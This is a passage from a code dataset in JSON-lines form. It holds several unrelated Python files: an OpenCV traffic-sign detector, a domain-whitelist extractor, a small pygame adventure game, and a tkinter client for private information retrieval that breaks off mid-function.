pin2, 10) and abs(get_length(l1)-get_length(l2)) < 10:\n# common = [(pin1[0] + pin2[0]) / 2, (pin1[1] + pin2[1]) / 2]\n# placed = False\n# l1t = tuple(l1)\n# l2t = tuple(l2)\n# ct = tuple(common)\n# for octagon in octagons:\n# if l1t in octagon[\"lines\"] or l2t in octagon[\"lines\"]:\n# octagon[\"lines\"].add(l1t)\n# octagon[\"lines\"].add(l2t)\n# octagon[\"common\"].add(ct)\n# placed = True\n# if not placed:\n# octagon = {\"lines\": set([l1t, l2t]), \"common\": set({ct})}\n# octagons.append(octagon)\n\"\"\"\nprint(len(octagons))\n\nfor o in octagons:\n print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n for point in o[\"common\"]:\n cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n thickness=2)\n show_img(\"\",sign_draw)\n\nFor Do Not Enter signs\ncircles = cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT, 1, 20,\n param1=15, param2=20,\n minRadius=5, maxRadius=50)\nif circles is None: exit() # should become return 0, 0\n\ncircles = np.uint16(np.around(circles))\ncshape = circles.shape\ncenters = circles.reshape(cshape[1], cshape[2])\n\n\n# will get circles with lines inside of it\nlinesIn = get_lines_in_circles(lines, centers)\n\nfor l_pair in linesIn:\n circle = np.array(l_pair[\"cir\"])\n r = (circle[2] / 2).astype(int)\n red = np.mean(sign_draw[circle[1] - r:circle[1] + r,\n circle[0] - r:circle[0] + r,\n 2])\n # check circle color\n if red > 200:\n c = (circle[0], circle[1])\n area = sign_draw[c[1]-5:c[1]+5, c[0]-5:c[0]+5]\n red = np.mean(area[:, :, 2])\n green = np.mean(area[:, :, 1])\n blue = np.mean(area[:, :, 0])\n if red > 200 and blue > 200 and green > 200:\n print(\"{} {}\".format(int(c[0]), int(c[1])))\n cv2.putText(sign_draw, \"*\", (int(c[0]), int(c[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n thickness=2)\n show_img(\"sign\",sign_draw)\n\n\n#show_img(\"lines and circles\", sign_draw)\n# if circles is not None:\n# circles = np.uint16(np.around(circles))\n# draw_circles(circles, sign_draw)\n# show_img(\"lines and circles\", sign_draw)\n\n\"\"\"\n\n\"\"\"for construction and warning\n# for diamond in diamonds:\n# print(\"lines: {} \\n common: {}\".format(diamond[\"lines\"], diamond[\"common\"]))\n# for point in diamond[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n# thickness=2)\n# show_img(\"\",sign_draw)\n# diamonds = get_diamonds(lines)\n#\n# for diamond in diamonds:\n# centerx = np.mean([c[0] for c in diamond[\"common\"]])\n# centery = np.mean([c[1] for c in diamond[\"common\"]])\n# area = sign_draw[int(centery) - 5:int(centery) + 5, int(centerx) - 5:int(centerx) + 5]\n# red = np.mean(area[:, :, 2])\n# green = np.mean(area[:, :, 1])\n# print(\"{} {}\".format(red, green))\n# if red > 200 and green > 200:\n# print(\"warning\")\n# cv2.putText(sign_draw, \"* warning\", (int(centerx), int(centery)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n# thickness=2)\n# show_img(\"\", sign_draw)\n\n\n# centers = get_square_centers(lines)\n#\n# for center in centers:\n# area = sign_draw[int(center[0])-5:int(center[0])+5, int(center[1])-5:int(center[1]) +5]\n# red = np.mean(area[:,:,2])\n# green = np.mean(area[:,:,1])\n# cv2.putText(sign_draw, \"*\", (int(center[1]),int(center[0])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n# show_img(\"sign\",sign_draw)\n# print(red)\n# print(green)\n# if red > 200 and green > 200:\n# print(\"warning\")\n#\n#\n# print(centers)\n# #print(\"{} {}\".format(x,y))\n\n#draw_tl_center(sign_draw, (x,y), \"yield\")\n# show_img(\"warning\", sign_draw)\n\"\"\"\n\ncv2.destroyAllWindows()\n","sub_path":"ps02/playing_signs.py","file_name":"playing_signs.py","file_ext":"py","file_size_in_byte":21082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70368114","text":"# _*_ coding=utf-8 _*_\n\nimport re\nimport os,sys\n\nprojectPath=os.getcwd()\n\n\nf=open(projectPath+\"/white_list/result.txt\",'r')\nL=[]\nwith open(projectPath+\"/white_list/white_list.txt\",\n 'w') as g:\n for i in f.readlines():\n j=i.strip('\\r\\n')\n l2=re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n l3 = re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n l1 = re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n if l1 :\n print(l1.group())\n\n L.append(l1)\n elif l2:\n print(l2.group())\n\n L.append(l2)\n elif l3:\n print(l3.group())\n L.append(l3)\n else:\n print(\"no urls\")\n for l in L:\n\n url=l.group(0)\n\n url=re.sub('www.','',url)\n g.write(url+'\\n')\n\nf.close()","sub_path":"com-fj-phishing-2/white_list/Qingxi.py","file_name":"Qingxi.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27351433","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 10:28:40 2019\n\n@author: Pedro Ball\n\"\"\"\n\n# Importando as bibliotecas necessárias.\nimport pygame\nfrom os import path\n\n# Estabelece a pasta que contem as figuras.\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# Dados gerais do jogo.\nWIDTH = 480 # Largura da tela\nHEIGHT = 450 # Altura da tela\nFPS = 60 # Frames por segundo\n\n# Define algumas variáveis com as cores básicas\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\n# Classe Jogador que representa a nave\nclass Mochila(pygame.sprite.Sprite):\n \n # Construtor da classe.\n def __init__(self):\n \n # Construtor da classe pai (Sprite).\n pygame.sprite.Sprite.__init__(self)\n \n # Carregando a imagem de fundo.\n mochila = pygame.image.load(path.join(img_dir, \"inventario.png\")).convert()\n self.image = mochila\n \n # Diminuindo o tamanho da imagem.\n self.image = pygame.transform.scale(mochila, (50, 38))\n \n # Deixando transparente.\n self.image.set_colorkey(BLACK)\n \n # Detalhes sobre o posicionamento.\n self.rect = self.image.get_rect()\n \n # Centraliza embaixo da tela.\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n\n# Classe Jogador que representa a seta\nclass Seta(pygame.sprite.Sprite):\n \n # Construtor da classe.\n def __init__(self):\n \n # Construtor da classe pai (Sprite).\n pygame.sprite.Sprite.__init__(self)\n \n # Carregando a imagem de fundo.\n seta = pygame.image.load(path.join(img_dir, \"SETA.png\")).convert()\n self.image = seta\n \n # Diminuindo o tamanho da imagem.\n self.image = pygame.transform.scale(seta, (50, 38))\n \n # Deixando transparente.\n self.image.set_colorkey(BLACK)\n \n # Detalhes sobre o posicionamento.\n self.rect = self.image.get_rect()\n \n # Centraliza embaixo da tela.\n self.rect.centerx = WIDTH - 40\n self.rect.bottom = HEIGHT - 400\n \nimg_local = \"\"\n\ndef load_assets(img_dir):\n assets = {}\n assets[\"Inicio\"] = pygame.image.load(path.join(img_dir, \"inicio.png\")).convert()\n assets[\"Quarto\"] = pygame.image.load(path.join(img_dir, \"quarto.png\")).convert()\n assets[\"Cama\"] = pygame.image.load(path.join(img_dir, \"cama.png\")).convert()\n assets[\"Recompensa\"] = pygame.image.load(path.join(img_dir,\"recompensa_1.png\")).convert()\n# assets[\"Inferno\"] = pygame.image.load(path.join(img_dir, \"inferno\"))\n assets[\"Inventario\"] = pygame.image.load(path.join(img_dir,\"inventario_0.png\"))\n if img_local == \"Cama\":\n assets[\"Inventario\"] = pygame.image.load(path.join(img_dir,\"inventario_1.png\"))\n return assets\n\ndef load_inventario(img_dir):\n inventory = {}\n inventory[\"Água Benta\"]\n\n# Inicialização do Pygame.\npygame.init()\npygame.mixer.init()\n\n# Tamanho da tela.\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n# Nome do jogo\npygame.display.set_caption(\"Doom Escape\")\n\n# Variável para o ajuste de velocidade\nclock = pygame.time.Clock()\n\n# Carrega o fundo do jogo\nimg_dic = load_assets(img_dir)\n\n\n# Cria uma nave. O construtor será chamado automaticamente.\nmochila = Mochila()\nseta = Seta()\n# Cria um grupo de sprites e adiciona a nave.\nall_sprites = pygame.sprite.Group()\nall_sprites.add(mochila)\nall_sprites.add(seta)\n\n# Comando para evitar travamentos.\nimg_local = \"Inicio\"\nimg_local_0 = \"\"\n\n\ntry:\n \n # Loop principal.\n running = True\n while running:\n \n # Ajusta a velocidade do jogo.\n clock.tick(FPS)\n \n # Processa os eventos (mouse, teclado, botão, etc).\n for event in pygame.event.get():\n \n # Verifica se foi fechado\n if event.type == pygame.QUIT:\n running = False\n\n elif img_local == \"Inicio\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 0 and px < 480 and py > 0 and py < 450:\n img_local = \"Quarto\"\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Inicio\"\n img_local = \"Inventario\"\n \n elif img_local == \"Quarto\": \n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 70 and px < 310 and py > 270 and py < 370:\n img_local = \"Cama\"\n if px > 387 and px < 449 and py > 244 and py < 270:\n img_local = \"Recompensa\"\n img_local_0 = \"\"\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Quarto\"\n img_local = \"Inventario\"\n elif img_local == \"Cama\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Cama\"\n img_local = \"Inventario\"\n \n elif img_local == \"Inventario\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local = img_local_0\n \n # A cada loop, redesenha o fundo e os sprites\n screen.fill(BLACK)\n reindera_imagem = pygame.transform.scale(img_dic[img_local], (480, 450))\n screen.blit(reindera_imagem, img_dic[img_local].get_rect())\n #screen.blit(img_dic[\"Inventario\"], img_dic[\"Inventario\"].get_rect())\n all_sprites.draw(screen)\n \n # Depois de desenhar tudo, inverte o display.\n pygame.display.flip()\n \nfinally:\n pygame.quit()","sub_path":"Desenvolvimento e Tentativas/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48044627","text":"# import socket\r\n# import random\r\n# \r\n# def client(string):\r\n# HOST, PORT = 'localhost', 31100\r\n# # SOCK_STREAM == a TCP socket\r\n# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# #sock.setblocking(0) # optional non-blocking\r\n# sock.connect((HOST, PORT))\r\n# \r\n# self.logger.info (\"sending data => [%s]\" % (string))\r\n# \r\n# sock.send(bytes(string, \"utf-8\"))\r\n# reply = sock.recv(16384) # limit reply to 16K\r\n# self.logger.info (\"reply => \\n [%s]\" % (reply))\r\n# sock.close()\r\n# return reply\r\n# \r\n# def main():\r\n# client('Python Rocks')\r\n# \r\n# if __name__ == \"__main__\":\r\n# main()\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom threading import RLock\r\nfrom queue import Queue\r\nfrom threading import Thread\r\nfrom PIL import ImageTk\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport math\r\nfrom PIRQueryObject import PIRQueryObject\r\n\r\n'''''\r\nhttp://python.about.com/od/python30/ss/30_strings_3.htm\r\n'''''\r\nimport logging\r\nimport threading\r\nimport socket\r\nfrom FrameBuilder import FrameBuilder\r\nfrom time import sleep\r\nfrom OpCodes import OpCodes\r\nimport binascii\r\nimport random\r\nfrom bitstring import BitArray\r\nimport time\r\nfrom Crypto import Random\r\nfrom Crypto.Cipher import AES\r\nfrom sys import byteorder\r\nimport random\r\nfrom itertools import count\r\nfrom tkinter import messagebox\r\nimport pickle \r\n\r\ncodes = OpCodes()\r\nS_M_PORT = 31100\r\nactive_servers = {}\r\nserversPool = Queue()\r\nserversQueryReply = list()\r\nSEED_LENGTH = 128\r\nclass client_window(Frame):\r\n \r\n \r\n pirClient = None\r\n \r\n def __init__(self, parent):\r\n logging.basicConfig(level=logging.DEBUG,format='%(name)s: %(message)s',)\r\n self.logger = logging.getLogger(\"Client Window\")\r\n \r\n \r\n \r\n #################### Global variables ####################\r\n \r\n self.DB_LENGTH = 500\r\n self.queryMethod=IntVar()\r\n self.desirableBit=0\r\n self.myParent = parent \r\n \r\n self.myParent.title('PIR Client')\r\n self.masterFrame = ttk.Frame(self.myParent,padding=(0,10,0,5)) ###\r\n self.masterFrame.grid(column=0, row=0, sticky=(N, S, E, W))\r\n \r\n self.pirClient = PIRClient(self)\r\n \r\n #------ constants for controlling layout ------\r\n button_width = 12 ### (1)\r\n button_height = 3\r\n \r\n button_padx = \"2\" ### (2)\r\n button_pady = \"1\" ### (2)\r\n\r\n buttons_frame_padx = \"3\" ### (3)\r\n buttons_frame_pady = \"3\" ### (3) \r\n buttons_frame_ipadx = \"3\" ### (3)\r\n buttons_frame_ipady = \"3\" ### (3)\r\n # -------------- end constants ----------------\r\n\r\n self.style = ttk.Style(self.myParent)\r\n self.style.configure('TButton', font=(\"Arial\", 8,'bold'))#larger Font for buttons\r\n self.style.configure('TLabel', font=(\"Arial\", 10,'bold'))#larger Font for buttons\r\n \r\n self.icn_SM_disconnected = ImageTk.PhotoImage(file=\"icons/Red-icon32.png\")\r\n self.icn_SM_connected = ImageTk.PhotoImage(file=\"icons/Green-icon32.png\")\r\n self.icn_compare = ImageTk.PhotoImage(file=\"icons/compare24.png\")\r\n self.icn_query = ImageTk.PhotoImage(file=\"icons/download24.png\")\r\n self.icn_exit = ImageTk.PhotoImage(file=\"icons/exit24.png\")\r\n\r\n self.lbl_SMAddress = ttk.Label(self.masterFrame, compound=LEFT, style='TLabel', text=\"Server manager address: \" )\r\n self.lbl_SMAddress.grid(row=0,column=0, columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n\r\n self.txt_SMAddress = ttk.Entry(self.masterFrame, justify=CENTER, width=button_width)\r\n self.txt_SMAddress.insert(0, '192.168.4.1')\r\n self.txt_SMAddress.grid(row=0,column=7, columnspan=1, rowspan=1, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n# self.lbl_padding = ttk.Label(self.masterFrame, compound=LEFT)\r\n# self.lbl_padding.grid(row=0,column=3, columnspan=3, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n# \r\n self.btn_connect = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickConnect, style='TButton', text=\"Connect \",width=button_width )\r\n self.btn_connect.grid(row=2,column=0, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.lbl_connectionSts = Label(self.masterFrame, image=self.icn_SM_disconnected)\r\n self.lbl_connectionSts.grid(row=2, column=7, sticky=(E))\r\n \r\n self.chk_pir = ttk.Radiobutton(self.masterFrame, text='PIR', variable=self.queryMethod, value=1)\r\n self.chk_pir.grid(row=3,column=0,columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W, S))\r\n self.chk_pir.state(['selected'])\r\n self.queryMethod.set(1)\r\n \r\n self.chk_regular = ttk.Radiobutton(self.masterFrame, text='Standard', variable=self.queryMethod, value=2)\r\n self.chk_regular.grid(row=4,column=0,columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W, S))\r\n \r\n self.scl_bitChoice = ttk.Scale(self.masterFrame, orient=HORIZONTAL, from_=0.0, to=self.DB_LENGTH,command=self.updatDesiedBit)\r\n self.scl_bitChoice.grid(row=5, column=0, columnspan=8, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady,sticky=(W,E))\r\n self.scl_bitChoice.state([\"disabled\"]) # Disable the scale bar.\r\n \r\n self.lbl_bitIndex = ttk.Label(self.masterFrame, compound=CENTER, style='TLabel' , text = '0')\r\n self.lbl_bitIndex.grid(row=6,column=1, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W,E))\r\n \r\n \r\n self.btn_query = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickQuery, style='TButton', text=\"Get value \",image=self.icn_query, width=button_width )\r\n self.btn_query.grid(row=7,column=0, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.lbl_result = ttk.Label(self.masterFrame, compound=CENTER, style='TLabel', text='XX',justify=LEFT)\r\n self.lbl_result.grid(row=7,column=7, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n \r\n self.btn_compare = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickCompare, style='TButton', text=\"Compare \", image=self.icn_compare, width=button_width )\r\n self.btn_compare.grid(row=8,column=0, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.btn_exit = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickExit, style='TButton', text=\"Exit \", image=self.icn_exit, width=button_width )\r\n self.btn_exit.grid(row=8,column=7, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n def updatDesiedBit(self,value): \r\n self.lbl_bitIndex.configure(text= str(int(float(value))))\r\n \r\n def clickConnect(self): \r\n self.pirClient.initateConnection(self.txt_SMAddress.get())\r\n \r\n \r\n \r\n \r\n def disableConnectBtn(self):\r\n self.btn_connect.state([\"disabled\"])\r\n \r\n def enableConnectBtn(self):\r\n self.btn_connect.state([\"!disabled\"])\r\n \r\n def ServerConnected_icon(self):\r\n self.lbl_connectionSts.config(image=self.icn_SM_connected)\r\n def ServerDisconnected_icon(self):\r\n self.lbl_connectionSts.config(image=self.icn_SM_disconnected)\r\n \r\n def enableScale(self):\r\n self.scl_bitChoice.state([\"!disabled\"]) # Enable the scale bar.\r\n \r\n def getCurrentScaleNum(self):\r\n return (int)(self.scl_bitChoice.get())\r\n \r\n def clickExit(self):\r\n self.myParent.destroy()\r\n \r\n def configureDBScale(self,valueToUpdate):\r\n self.scl_bitChoice.configure(to=valueToUpdate) \r\n \r\n def clickQuery(self):\r\n if self.queryMethod.get()==1:\r\n self.logger.info(\"PIR radio selected\")\r\n self.pirClient.executeQuery()\r\n\r\n elif self.queryMethod.get()==2:\r\n self.logger.info(\"Regular radio selected\")\r\n self.generateRegQuery()\r\n \r\n def writeResultToLabel(self,aResultToWrite):\r\n self.lbl_result.configure(text=aResultToWrite,justify=LEFT) \r\n \r\n def showWarningPopUp(self,aTitle,aMsg):\r\n messagebox.showinfo(aTitle,aMsg)\r\n \r\n def generateRegQuery(self):\r\n self.pirClient.executeQuery()\r\n \r\n \r\n def clickCompare(self):\r\n N = 2\r\n# queryResult = bin(int(self.lbl_result.cget(\"text\")))\r\n results = (self.pirClient.currentQueryLength,self.pirClient.DB_LENGTH)\r\n# queryResult = 2\r\n# results = 10\r\n ind = np.arange(N) # the x locations for the groups\r\n width = 0.1 # the width of the bars: can also be len(x) sequence\r\n\r\n plt.bar(ind, results, width, color='r')\r\n plt.bar(ind, results, width, color='g')\r\n \r\n plt.ylabel('Bits')\r\n plt.title('PIR vs. non PIR data transfer')\r\n plt.xticks(ind+width/2., ('PIR','regular') )\r\n\r\n plt.show()\r\n \r\n \r\n \r\n \r\n \r\n###############################################################################\r\n## PIR Algorithm functions section ##\r\n############################################################################### \r\n# def encrypt(self,message, key=None, key_size=128):\r\n# def pad(s):\r\n# x = AES.block_size - len(s) % AES.block_size\r\n# return s + (bytes([x]) * x)\r\n# \r\n# padded_message = pad(message)\r\n# if key is None:\r\n# key = Random.new().read(key_size // 8)\r\n# \r\n# cipher = AES.new(key)\r\n# return (cipher.encrypt(padded_message)) \r\n# \r\n# \r\n# def createRandomSeeds(self):\r\n# global amountOfSeeds\r\n# seedListAsBytes = []\r\n# amountOfSeeds = int((math.sqrt(self.DB_LENGTH)-1)*(2**(self.currentServersQuantity-1)-1)+2**(self.currentServersQuantity-1))\r\n# self.logger.info(\"amount of seeds:\",amountOfSeeds)\r\n# for _ in range (0,amountOfSeeds):\r\n# seedAsByte = BitArray(os.urandom(16))\r\n# seedListAsBytes.append(seedAsByte.hex)\r\n# return seedListAsBytes \r\n# \r\n# \r\n# def createCWListPool(self):\r\n# global CWListPool\r\n# CWListPool = [] \r\n# #tempCw = BitArray(os.urandom((int)(math.sqrt(dataBaseSizeVar)/8)))\r\n# # CWList.append(tempCw)\r\n# for _ in range (1,2**(self.currentServersQuantity-1)):\r\n# tempCw = BitArray(os.urandom((int)(math.sqrt(self.DB_LENGTH)/8)))\r\n# CWListPool.append(tempCw)\r\n# self.logger.info(\"size of CWlist:\",CWListPool.__len__()) \r\n# \r\n# \r\n# def convertMatrix(self,aMatrixToConvert):\r\n# global matrixA\r\n# global matrixB\r\n# matrixA = []\r\n# matrixB = []\r\n# \r\n# for index in range (0,numRows):\r\n# if (aMatrixToConvert[index].count(1)%2) == 0:\r\n# matrixA.append(aMatrixToConvert[index])\r\n# else:\r\n# matrixB.append(aMatrixToConvert[index])\r\n# # self.logger.info(\"matrix A\",matrixA)\r\n# # self.logger.info(\"matrix B\",matrixB)\r\n# t=0 \r\n# for i in matrixA: \r\n# t+=i[0] \r\n# self.logger.info(\"seed per section:\",t) \r\n# \r\n# \r\n# def buildMatrices(self):\r\n# matrix = []\r\n# global numRows\r\n# numRows = 2**self.currentServersQuantity\r\n# self.logger.info(\"#self.currentServersQuantity = %d\" %self.currentServersQuantity)\r\n# for index in range (0,numRows):\r\n# matrix.append([int(d) for d in bin(index)[2:].zfill(self.currentServersQuantity)])\r\n# # self.logger.info(matrix)\r\n# self.convertMatrix(matrix) \r\n# \r\n# \r\n# def transformIndexBit(self):\r\n# global transformedRowIndex\r\n# global transformedColumnIndex\r\n# \r\n# bitToExtractIndex = int(self.scl_bitChoice.get())\r\n# transformedRowIndex = int(bitToExtractIndex/(math.sqrt(self.DB_LENGTH))) #### i'\r\n# transformedColumnIndex = int(bitToExtractIndex%(math.sqrt(self.DB_LENGTH))) #### j\r\n# \r\n# \r\n# def createGFunctions(self,aSeedList):\r\n# listOfGFunction = []\r\n# \r\n# for seed in aSeedList: \r\n# listOfGFunction.append(self.inflatorFunction(seed)) \r\n# \r\n# return listOfGFunction \r\n# \r\n# \r\n# def createEjVector(self):\r\n# global unitVectorJAsBytes\r\n# rootedDatabaseSizeVar = (int)(math.sqrt(self.DB_LENGTH))\r\n# for index in range(0,rootedDatabaseSizeVar):\r\n# if index == transformedColumnIndex:\r\n# break \r\n# unitVectorJAsBytes = BitArray(int = 1, length = rootedDatabaseSizeVar)\r\n# unitVectorJAsBytes <<= ((rootedDatabaseSizeVar-1) - index)\r\n# self.logger.info (unitVectorJAsBytes.bin)\r\n# \r\n# \r\n# def inflatorFunction(self,aSeedToInflate):\r\n# gFunction = BitArray(self.encrypt(str(0).encode('utf-8'),aSeedToInflate))\r\n# for i in range (1,(int)(math.sqrt(self.DB_LENGTH)/SEED_LENGTH)):\r\n# gFunction.append(self.encrypt(str(i).encode('utf-8'),aSeedToInflate))\r\n# return BitArray(gFunction) \r\n# \r\n# \r\n# ###############################################################################\r\n# ## Communication stuff starts here ##\r\n# ###############################################################################\r\n# \r\n# \r\n# def createTIndicatorsPool(self):\r\n# tIndicatorsPool = []\r\n# for tIndicatorIndex in range (0,2**(self.currentServersQuantity-1)):\r\n# tIndicatorsPool.append((tIndicatorIndex,tIndicatorIndex))\r\n# return tIndicatorsPool \r\n# \r\n# \r\n# def findKthCW(self,aListOfGFunction):\r\n# tempGFunctionResult = BitArray(int = 0,length = (int)(math.sqrt(self.DB_LENGTH)))\r\n# tempCWResult = BitArray(int = 0,length =(int)(math.sqrt(self.DB_LENGTH)))\r\n# \r\n# for gFunctionIndex in range (0,amountOfSeeds):\r\n# tempGFunctionResult = tempGFunctionResult ^ aListOfGFunction[gFunctionIndex]\r\n# for cwIndex in range(0,2**(self.currentServersQuantity-1)-1):\r\n# tempCWResult = tempCWResult ^ CWListPool[cwIndex]\r\n# kthCw = tempGFunctionResult ^ tempCWResult ^ unitVectorJAsBytes\r\n# self.logger.info(\"kthCW:\",kthCw)\r\n# CWListPool.append(kthCw)\r\n# \r\n# \r\n# def appendCWListPoolToQuery(self):\r\n# global serversQueryWithCWAppended \r\n# serversQueryWithCWAppended = {}\r\n# \r\n# for serversIndex in range(0,self.currentServersQuantity):\r\n# seedsList,indicatorsList = self.serversQuery[serversIndex]\r\n# serversQueryWithCWAppended[serversIndex] = (seedsList,indicatorsList,CWListPool)\r\n# self.logger.info(\"amount of CW:\",CWListPool.__len__()) \r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[0][2].__len__())\r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[1])\r\n# # self.logger.info(\"server query with CWListPool\",serversQueryWithCWAppended[2]\r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# \r\n# def generatePIRQuery(self,aSeedsList,aTIndicatorsList):\r\n# targetBit = int(self.scl_bitChoice.get())\r\n# self.currentServersQuantity = active_servers.__len__()\r\n# \r\n# self.serversQuery\r\n# rootedDatabaseSizeVar = (int)(math.sqrt(self.DB_LENGTH))\r\n# # self.logger.info(\"rootedSize\",rootedDatabaseSizeVar)\r\n# # self.logger.info(\"j index:\",transformedColumnIndex)\r\n# # self.logger.info(\"i' index:\",transformedRowIndex)\r\n# \r\n# \r\n# tempSeedListPerSection = []\r\n# serversQuery = {}\r\n# startIndex = 0\r\n# endIndex = 0\r\n# \r\n# # self.logger.info(\"seed pool\",seedListAsBytes)\r\n# for serverAmountIndex in range(0,self.currentServersQuantity):\r\n# serversQuery[serverAmountIndex] = ([],[])\r\n# for sectionIndex in range(0,rootedDatabaseSizeVar):\r\n# seedIndex = 0\r\n# \r\n# if sectionIndex == transformedRowIndex:# important section\r\n# choosingMatrix = matrixB\r\n# importantSectionIndicator = 0\r\n# else:#not important section\r\n# choosingMatrix = matrixA\r\n# importantSectionIndicator = 1\r\n# \r\n# #prepares the indices for next withdrawal from seed pool for all runs except the first run\r\n# startIndex = endIndex\r\n# endIndex = endIndex + 2**(self.currentServersQuantity-1) - importantSectionIndicator \r\n# \r\n# if sectionIndex == 0: #first run\r\n# startIndex = 0\r\n# endIndex = 2**(self.currentServersQuantity-1)-importantSectionIndicator \r\n# \r\n# tempSeedListPerSection = aSeedsList[startIndex:endIndex]\r\n# if importantSectionIndicator == 1:# when we in a section that is not important we have an array of 2^(k-1) seeds, and we need to add another seed to be modular\r\n# tempSeedListPerSection.insert(0,0xFF)\r\n# # self.logger.info(\"choosing matrix \",choosingMatrix,\"section number:\",sectionIndex+1)\r\n# # self.logger.info(\"list for a section\",tempSeedListPerSection) \r\n# for choosingMatrixColumnIndex in choosingMatrix:\r\n# matchSeedToServerList = [i for i, j in enumerate(choosingMatrixColumnIndex) if j == 1]\r\n# # self.logger.info(\"matchedListMatrix A\",matchSeedToServerList)\r\n# for serverIndex in matchSeedToServerList:\r\n# tmpSeedList,tmpIndicatorsList = serversQuery[serverIndex]\r\n# tmpSeedList.append(tempSeedListPerSection[seedIndex])\r\n# tmpIndicatorsList.append((aTIndicatorsList[seedIndex])[0])\r\n# serversQuery[serverIndex] = (tmpSeedList,tmpIndicatorsList)\r\n# seedIndex+=1\r\n# # self.logger.info(\"server query\",serversQuery) \r\n# random.shuffle(aTIndicatorsList)\r\n# # self.logger.info(\"server query\",serversQuery[0])\r\n# # self.logger.info(\"server query\",serversQuery[1])\r\n# # self.logger.info(\"server query\",serversQuery[2])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n# def clickQueryHandler(self):\r\n# bitToExtractIndex = int(self.scl_bitChoice.get())\r\n# \r\n# self.buildMatrices()\r\n# seedList = self.createRandomSeeds()\r\n# listOfGFuncion = self.createGFunctions(seedList)\r\n# self.transformIndexBit()\r\n# self.createCWListPool()\r\n# listOfIndicators = self.createTIndicatorsPool()\r\n# self.createEjVector()\r\n# self.findKthCW(listOfGFuncion)\r\n# self.generateQuery(seedList,listOfIndicators)\r\n# self.appendCWListPoolToQuery() \r\n \r\n \r\n \r\n \r\n \r\nclass PIRClient():\r\n \r\n clientWindowManager = None\r\n lock = RLock()\r\n frameBuilder = FrameBuilder()\r\n pirQuery = None\r\n def __init__(self,aWindowManager): \r\n logging.basicConfig(level=logging.DEBUG,format='%(name)s: %(message)s',)\r\n self.logger = logging.getLogger(\"Client\")\r\n self.clientWindowManager = aWindowManager\r\n \r\n def initateConnection(self,aSMAddress):\r\n# 